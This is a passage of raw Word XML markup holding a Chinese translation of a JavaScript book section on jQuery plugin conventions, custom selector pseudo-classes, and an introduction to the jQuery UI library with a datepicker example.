        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;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通过上面对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fn.println()</w:t>
      </w:r>
      <w:r>
        <w:t>函数的定义，我们可以在任何</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象上类似如下调用</w:t>
      </w:r>
      <w:r>
        <w:t>println()</w:t>
      </w:r>
      <w:r>
        <w:t>方法了：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#debug").println("x=",x,";y=",y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这是添加新方法到</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fn</w:t>
      </w:r>
      <w:r>
        <w:t>中的常见开发方式。如果发现自己在使用</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>手动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的元素，并在元素上执行某些操作时，就可以问问自己，是否可以将代码重构一下，使得这些</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>回调移动到一个扩展方法里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>。在开发扩展功能时，如果遵守基本的模块化代码实践，以及遵守</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>特定的一些传统约定，就可以将该扩展称为插件，并与他人分享。下面是一些值得留意的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件约定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>不要依赖</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>标识符：包含的页面有可能调用了</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.noConflict()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>可能不再</w:t>
      </w:r>
      <w:r>
        <w:t>等同于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。在上面这种简短的插件里，只要使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>代替</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>就行。如果开发的扩展很长，则</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>最好用一个匿名函数将扩展代码都包装起来，以避免创建全局变量。如果这样做，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数传递给匿名函数，参数名采用</w:t>
      </w:r>
      <w:r>
        <w:t>$:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(function($){//</w:t>
      </w:r>
      <w:r>
        <w:t>带有参数名为</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>的匿名函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在此书写插件代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}(jQuery));//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为参数调用该匿名函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果插件代码不返回自己的值，请确保返回</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象以便链式调用。通常这就是</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>对象，只要不加修改地返回即可。在上面</w:t>
      </w:r>
      <w:r>
        <w:t>的例子中，方法末尾是</w:t>
      </w:r>
      <w:r>
        <w:t>"return this;"</w:t>
      </w:r>
      <w:r>
        <w:t>代码行。遵循</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的另一个习俗，可以让上面的方法更简短些（可读性低一些）：返回</w:t>
      </w:r>
      <w:r>
        <w:t>each()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的结果。这样，</w:t>
      </w:r>
      <w:r>
        <w:t>println()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会包含代码</w:t>
      </w:r>
      <w:r>
        <w:t>"return this.each(function(){...});"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果扩展方式拥有两个以上参数或配置选项，请允许用户能使用对象的方式传递选项（就如我们在</w:t>
      </w:r>
      <w:r>
        <w:t>19.5.2</w:t>
      </w:r>
      <w:r>
        <w:t>节看到的</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和在</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节看到的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>函数一样）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>不要污染</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法的命名空间。优雅的</w:t>
      </w:r>
      <w:r>
        <w:t>jQ</w:t>
      </w:r>
      <w:r>
        <w:t>uery</w:t>
      </w:r>
      <w:r>
        <w:t>插件会用一套有用的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义最少量的方法。通常，一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件只会在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fn</w:t>
      </w:r>
      <w:r>
        <w:t>上定义一个方法。该方法会接受字符串作为第一个参数，然</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>后将该字符串作为函数名解析，然后将剩余参数传给该解析函数。当可以将插件限定为一个方法时，该方法名应该与插件同名。如果需要定义多个方法，则使用插件名作为每一个方法名的前缀。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果插件需要绑定事件处理程序，请将所有这些处理程序放在事件命名空间中（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）。使用插件名作为命名空间名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果插件需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>方法与元素关联数据，请将所有数据值放</w:t>
      </w:r>
      <w:r>
        <w:t>在单一对象中，然后用与插件名相同的键值将该对象作为单一值存储。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>"jquery.plugin.js"</w:t>
      </w:r>
      <w:r>
        <w:t>这种文件命名方式保存插件代码到一个文件中（将</w:t>
      </w:r>
      <w:r>
        <w:t>"plugin"</w:t>
      </w:r>
      <w:r>
        <w:t>替换为插件名）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>插件可以给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>自身增加函数来添加新的工具函数。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该方法输出其参数（使用</w:t>
      </w:r>
      <w:r>
        <w:t>println()</w:t>
      </w:r>
      <w:r>
        <w:t>插件方法）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"debug"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素上。如果不存在该元素，则创建一个并添加到文档中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.debug=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=jQuery("#debug");//</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>#debug</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>(elt.length==0){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它不存在则创建之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt=jQuery("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div id='debug'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Debugging Output</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery(document.body).append(elt);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.println.apply(elt,arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>将参数输出到元素中</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除了定义新方法，还可以扩展</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库的其他部分。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>19.5</w:t>
      </w:r>
      <w:r>
        <w:t>节中，我们已经看到可以通过给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fx.speeds</w:t>
      </w:r>
      <w:r>
        <w:t>添加属性来扩充新的动画时长名（除了</w:t>
      </w:r>
      <w:r>
        <w:t>"fast"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"slow"</w:t>
      </w:r>
      <w:r>
        <w:t>），也可以通过给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.easing</w:t>
      </w:r>
      <w:r>
        <w:t>添加属性来添加新的缓动函数。插件甚至可以扩展</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器引擎！可以通过给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.expr[':']</w:t>
      </w:r>
      <w:r>
        <w:t>对象添加属性来添加新的伪类过滤器（比如</w:t>
      </w:r>
      <w:r>
        <w:t>:first</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>:input</w:t>
      </w:r>
      <w:r>
        <w:t>）。下面这个例子定义了一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>:draggable</w:t>
      </w:r>
      <w:r>
        <w:t>过滤器，可用来仅返回拥有</w:t>
      </w:r>
      <w:r>
        <w:t>draggable=tr</w:t>
      </w:r>
      <w:r>
        <w:t>ue</w:t>
      </w:r>
      <w:r>
        <w:t>属性的元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.expr[':'].draggable=function(e){return e.draggable===true;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用上面定义的这个选择器，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>$("img:draggable")</w:t>
      </w:r>
      <w:r>
        <w:t>来选取可拖曳的图片，而不用使用冗长的</w:t>
      </w:r>
      <w:r>
        <w:t>$("img[draggable=true]")</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从上面的代码中可以看到，自定义选择器函数的第一个参数是候选的</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>元素。如果该元素匹配选择器，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。许多自定义选择器只需要这一个元素参数，但实际上在调用它们时传入了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数。第二个参数是整数序号，表示当前元素在候选元素数组中的位置。候选元素数组作为第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数传入，选择器不应该修改它。第三个参数很有趣的：这是调用</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp.exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法后返回的数组。如果有的话，该数组的第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个元素（序号是</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是伪类过滤器后面的圆括号中的值。圆括号和里面的任何引号都去除了，只留下参数字符串。下</w:t>
      </w:r>
      <w:r>
        <w:t>面是一个例子，用来说明如何实现一个</w:t>
      </w:r>
      <w:r>
        <w:t>:data(x)</w:t>
      </w:r>
      <w:r>
        <w:t>伪类，该伪类只在元素拥有</w:t>
      </w:r>
      <w:r>
        <w:t>data-x</w:t>
      </w:r>
      <w:r>
        <w:t>属性时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>（参考</w:t>
      </w:r>
      <w:r>
        <w:t>15.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.expr[':'].data=function(element,index,match,array){//</w:t>
      </w:r>
      <w:r>
        <w:t>注意：</w:t>
      </w:r>
      <w:r>
        <w:t>IE7</w:t>
      </w:r>
      <w:r>
        <w:t>及其以下版本不支持</w:t>
      </w:r>
      <w:r>
        <w:t>hasAttribute()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return element.hasAttribute("data-"+match[3]);</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01" w:name="19_10_jQuery_UILei_Ku_"/>
      <w:r>
        <w:t>19.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>类库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>限定自己只提供核心</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>、事件处理以及</w:t>
      </w:r>
      <w:r>
        <w:t>Aj</w:t>
      </w:r>
      <w:r>
        <w:t>ax</w:t>
      </w:r>
      <w:r>
        <w:t>功能。这提供了一个很棒的基础，可用来构建高层面的抽象，比如用户界面组件，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>类库就是这么做的。对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>做全面讲述不属于本书的范畴，在此我们只会简单概要地介绍它。该类库及其文档可以在这里找到：</w:t>
      </w:r>
      <w:r>
        <w:t>http://jqueryui.com</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类如其名，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一些用户界面组件：输入区域的自动完成、输入日期的日期选取器、用来组织信息的手风琴和标签页、可视化展现数字的滑块和进度条，以及用来和用户紧急通信的模态对话框。除了这些组件，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>还实现了更一般化的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>交</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>互</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>可以使得任何文档元素轻松就实现可拖曳、可放置、可改变大小、可选取或可排序。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>还给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>自身的效果方法提供了一些新的视觉效果方法（还使得可以变化颜色），同时定义很多新的缓动函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以把</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>想象成一组相关的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件，只是最后打包成一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件。要使用它很简单，在网页中，将</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>脚本放在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>代码后面引入进来就行。下载页面</w:t>
      </w:r>
      <w:r>
        <w:t>http://jqueryui.com</w:t>
      </w:r>
      <w:r>
        <w:t>允许选取计划使用的组件，然后会构建一个自定义的下载包，与整个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuer</w:t>
      </w:r>
      <w:r>
        <w:t>y UI</w:t>
      </w:r>
      <w:r>
        <w:t>类库相比，这可以减少页面的加载时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>是完全皮肤化的，它的皮肤直接采用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>文件的形式。因此除了要加载</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码到网页中，还需要引入选中皮肤的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>文件。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>站点标注了一些预先打包好的皮肤包，还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>皮肤工作坊</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>页面，可以让你自定义和下载自己的皮肤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>组件和交互功能采用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>插件的方法构建，每一个都定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法。通常，在已存在的文档元素中调用该方法时，会将该元素转化为组件。例如，要改变输入文本，以</w:t>
      </w:r>
      <w:r>
        <w:t>便在单击或聚焦文本输入框时它要弹出一个日期选取组件，直接用下面的代码调用</w:t>
      </w:r>
      <w:r>
        <w:t>datapicker()</w:t>
      </w:r>
      <w:r>
        <w:t>就行：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>class="date"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素转化成日期选取组件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("input.date").datepicker();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
